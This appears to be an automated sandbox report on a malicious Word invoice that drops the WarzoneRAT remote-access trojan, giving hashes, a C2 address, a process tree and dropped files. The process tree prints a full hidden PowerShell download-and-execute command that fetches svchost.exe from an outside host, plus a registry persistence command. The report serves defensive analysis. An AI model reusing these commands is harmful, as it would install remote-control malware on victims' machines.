Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    20-07-2021 11:29

General

  • Target

    INVOICE 00082925 -1y.doc

  • Size

    1.0MB

  • MD5

    3347d22680185efb3cd73d55b55a5c6d

  • SHA1

    36f0afde99cdabe38dbe7c281b61c17b1ca41372

  • SHA256

    5f815bd7f39cccb4b92bea3d36861d6844eeea3307e86b237d794c660d1305c3

  • SHA512

    54cd4b8033702d2192fe8d860df7a092a23675e1bf6450f5cc3862346ef6f078b6b3de03da81d246284adf8f7a9362909fde5efa361ce9135e9c29f64a0461db

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

httP://kqz.ugo.si/svchost.exe

Extracted

Family

warzonerat

C2

byx.z86.ru:5200

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 6 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\INVOICE 00082925 -1y.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\Admin\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\svchost.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:300
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:636
        • C:\Users\Admin\AppData\Local\Temp\svchost.exe
          C:\Users\Admin\AppData\Local\Temp\svchost.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1392
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\svchost.exe"
            5⤵
              PID:1520
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\svchost.exe"
                6⤵
                  PID:1668
              • C:\ProgramData\svchost.exe
                "C:\ProgramData\svchost.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1836
                • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                  C:\Users\Admin\AppData\Local\Temp\svchost.exe
                  6⤵
                  • Executes dropped EXE
                  PID:1056
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe"
                    7⤵
                      PID:816
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\Admin\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\svchost.exe'"
            2⤵
            • Process spawned unexpected child process
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1568
            • C:\Users\Admin\AppData\Roaming\svchost.exe
              "C:\Users\Admin\AppData\Roaming\svchost.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:296
              • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                C:\Users\Admin\AppData\Local\Temp\svchost.exe
                4⤵
                • Executes dropped EXE
                PID:1712
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://kqz.ugo.si/svchost.exe','C:\Users\Admin\AppData\Roaming\svchost.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\svchost.exe'"
            2⤵
            • Process spawned unexpected child process
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1520
            • C:\Users\Admin\AppData\Roaming\svchost.exe
              "C:\Users\Admin\AppData\Roaming\svchost.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:980
              • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                C:\Users\Admin\AppData\Local\Temp\svchost.exe
                4⤵
                • Executes dropped EXE
                PID:1744
          • C:\Windows\splwow64.exe
            C:\Windows\splwow64.exe 12288
            2⤵
              PID:1120

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Defense Evasion

          Modify Registry

          1
          T1112

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • C:\ProgramData\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
            MD5

            02ff38ac870de39782aeee04d7b48231

            SHA1

            0390d39fa216c9b0ecdb38238304e518fb2b5095

            SHA256

            fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

            SHA512

            24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
            MD5

            75a8da7754349b38d64c87c938545b1b

            SHA1

            5c28c257d51f1c1587e29164cc03ea880c21b417

            SHA256

            bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

            SHA512

            798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
            MD5

            be4d72095faf84233ac17b94744f7084

            SHA1

            cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

            SHA256

            b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

            SHA512

            43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
            MD5

            df44874327d79bd75e4264cb8dc01811

            SHA1

            1396b06debed65ea93c24998d244edebd3c0209d

            SHA256

            55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

            SHA512

            95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb
            MD5

            597009ea0430a463753e0f5b1d1a249e

            SHA1

            4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

            SHA256

            3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

            SHA512

            5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
            MD5

            5e3c7184a75d42dda1a83606a45001d8

            SHA1

            94ca15637721d88f30eb4b6220b805c5be0360ed

            SHA256

            8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

            SHA512

            fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
            MD5

            a725bb9fafcf91f3c6b7861a2bde6db2

            SHA1

            8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

            SHA256

            51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

            SHA512

            1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9
            MD5

            b6d38f250ccc9003dd70efd3b778117f

            SHA1

            d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

            SHA256

            4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

            SHA512

            67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            MD5

            dea0da96648332e0ca4bc999143c6a9f

            SHA1

            328c52f7500a9d2097ce8a8c348a262793d8cba4

            SHA256

            09a67b83eea389e9d03256ec1458acb6921119541fa6750e3e8bc47e3a0a2fd7

            SHA512

            83ab75c19f6c17d6c9bf7602e14b72122240271556d0682cfc9ccdf1e1b71ed6114ec62939a4912464127bc1d10af5cb1f968accaf727b3bdb97a9316b7df053

          • C:\Users\Admin\AppData\Local\Temp\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • C:\Users\Admin\AppData\Local\Temp\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • C:\Users\Admin\AppData\Local\Temp\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • C:\Users\Admin\AppData\Local\Temp\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • C:\Users\Admin\AppData\Local\Temp\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • C:\Users\Admin\AppData\Local\Temp\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • C:\Users\Admin\AppData\Local\Temp\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            MD5

            f1ac9dacc74c7b6f7c0912150ff1701f

            SHA1

            d8ce9e16f1bd419072246cf6b8e7a3cc4b37428d

            SHA256

            f2770711e44b9e42a0cd8e28b012f5b8576ac32b7dbc5b9deaa71f956ccab31d

            SHA512

            cbe38369d804de5d406311a11249d90116004c4880a8949631ca2e71c2c77e36a1a2dc39844d5923f21bff913ddc64baba93fd914868a82243fb5635d36a5f0c

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            MD5

            f1ac9dacc74c7b6f7c0912150ff1701f

            SHA1

            d8ce9e16f1bd419072246cf6b8e7a3cc4b37428d

            SHA256

            f2770711e44b9e42a0cd8e28b012f5b8576ac32b7dbc5b9deaa71f956ccab31d

            SHA512

            cbe38369d804de5d406311a11249d90116004c4880a8949631ca2e71c2c77e36a1a2dc39844d5923f21bff913ddc64baba93fd914868a82243fb5635d36a5f0c

          • C:\Users\Admin\AppData\Roaming\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • C:\Users\Admin\AppData\Roaming\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • C:\Users\Admin\AppData\Roaming\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • C:\Users\Admin\AppData\Roaming\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • \ProgramData\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • \Users\Admin\AppData\Local\Temp\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • \Users\Admin\AppData\Local\Temp\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • \Users\Admin\AppData\Local\Temp\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • \Users\Admin\AppData\Local\Temp\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • \Users\Admin\AppData\Roaming\svchost.exe
            MD5

            03c3dcb65eac90148838972f83b3d127

            SHA1

            3444fa4d8a0109e4ed791af052b237f1c3c7e88d

            SHA256

            2d1e7b0b691c806b94f685f348dbe5bb4857edf0408f363314fe97535f4723a1

            SHA512

            ba902e3ea4efff9b1f37d8bfc37286b64390f98b0a5158c3e2e6510f6dd0fcda74be53598a8385425efe6503e9d7bb139e523c73e1b36846115edebe59188619

          • memory/296-136-0x0000000004D40000-0x0000000004D41000-memory.dmp
            Filesize

            4KB

          • memory/296-140-0x0000000004D45000-0x0000000004D56000-memory.dmp
            Filesize

            68KB

          • memory/296-126-0x0000000000000000-mapping.dmp
          • memory/300-65-0x0000000000AA0000-0x0000000000AA1000-memory.dmp
            Filesize

            4KB

          • memory/300-66-0x0000000004880000-0x0000000004881000-memory.dmp
            Filesize

            4KB

          • memory/300-68-0x0000000004842000-0x0000000004843000-memory.dmp
            Filesize

            4KB

          • memory/300-63-0x0000000000000000-mapping.dmp
          • memory/300-67-0x0000000004840000-0x0000000004841000-memory.dmp
            Filesize

            4KB

          • memory/300-69-0x0000000001060000-0x0000000001061000-memory.dmp
            Filesize

            4KB

          • memory/300-79-0x000000007EF30000-0x000000007EF31000-memory.dmp
            Filesize

            4KB

          • memory/300-88-0x00000000062C0000-0x00000000062C1000-memory.dmp
            Filesize

            4KB

          • memory/300-78-0x0000000005680000-0x0000000005681000-memory.dmp
            Filesize

            4KB

          • memory/300-73-0x0000000005610000-0x0000000005611000-memory.dmp
            Filesize

            4KB

          • memory/300-80-0x0000000006190000-0x0000000006191000-memory.dmp
            Filesize

            4KB

          • memory/300-87-0x0000000006280000-0x0000000006281000-memory.dmp
            Filesize

            4KB

          • memory/300-70-0x0000000001310000-0x0000000001311000-memory.dmp
            Filesize

            4KB

          • memory/636-125-0x0000000002070000-0x0000000002071000-memory.dmp
            Filesize

            4KB

          • memory/636-120-0x0000000000040000-0x0000000000041000-memory.dmp
            Filesize

            4KB

          • memory/636-139-0x0000000002075000-0x0000000002086000-memory.dmp
            Filesize

            68KB

          • memory/636-107-0x0000000000000000-mapping.dmp
          • memory/636-158-0x00000000053F0000-0x0000000005466000-memory.dmp
            Filesize

            472KB

          • memory/636-143-0x0000000004300000-0x0000000004355000-memory.dmp
            Filesize

            340KB

          • memory/816-203-0x0000000000160000-0x0000000000161000-memory.dmp
            Filesize

            4KB

          • memory/816-202-0x0000000000000000-mapping.dmp
          • memory/980-132-0x0000000000000000-mapping.dmp
          • memory/980-137-0x00000000047D0000-0x00000000047D1000-memory.dmp
            Filesize

            4KB

          • memory/980-138-0x00000000047D5000-0x00000000047E6000-memory.dmp
            Filesize

            68KB

          • memory/1056-197-0x0000000000405E28-mapping.dmp
          • memory/1056-200-0x0000000000400000-0x000000000055E000-memory.dmp
            Filesize

            1.4MB

          • memory/1120-141-0x0000000000000000-mapping.dmp
          • memory/1120-142-0x000007FEFB931000-0x000007FEFB933000-memory.dmp
            Filesize

            8KB

          • memory/1392-172-0x0000000000405E28-mapping.dmp
          • memory/1520-110-0x0000000004972000-0x0000000004973000-memory.dmp
            Filesize

            4KB

          • memory/1520-105-0x0000000004970000-0x0000000004971000-memory.dmp
            Filesize

            4KB

          • memory/1520-179-0x0000000000000000-mapping.dmp
          • memory/1520-90-0x0000000000000000-mapping.dmp
          • memory/1568-104-0x0000000000F72000-0x0000000000F73000-memory.dmp
            Filesize

            4KB

          • memory/1568-89-0x0000000000000000-mapping.dmp
          • memory/1568-103-0x0000000000F70000-0x0000000000F71000-memory.dmp
            Filesize

            4KB

          • memory/1568-124-0x0000000006280000-0x0000000006281000-memory.dmp
            Filesize

            4KB

          • memory/1668-184-0x0000000000000000-mapping.dmp
          • memory/1712-178-0x0000000000400000-0x000000000055E000-memory.dmp
            Filesize

            1.4MB

          • memory/1712-173-0x0000000000405E28-mapping.dmp
          • memory/1744-165-0x0000000000405E28-mapping.dmp
          • memory/1836-181-0x0000000000000000-mapping.dmp
          • memory/1836-188-0x0000000004F25000-0x0000000004F36000-memory.dmp
            Filesize

            68KB

          • memory/1836-187-0x0000000004F20000-0x0000000004F21000-memory.dmp
            Filesize

            4KB

          • memory/1996-62-0x0000000075D41000-0x0000000075D43000-memory.dmp
            Filesize

            8KB

          • memory/1996-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
            Filesize

            64KB

          • memory/1996-60-0x000000006FD11000-0x000000006FD13000-memory.dmp
            Filesize

            8KB

          • memory/1996-59-0x0000000072291000-0x0000000072294000-memory.dmp
            Filesize

            12KB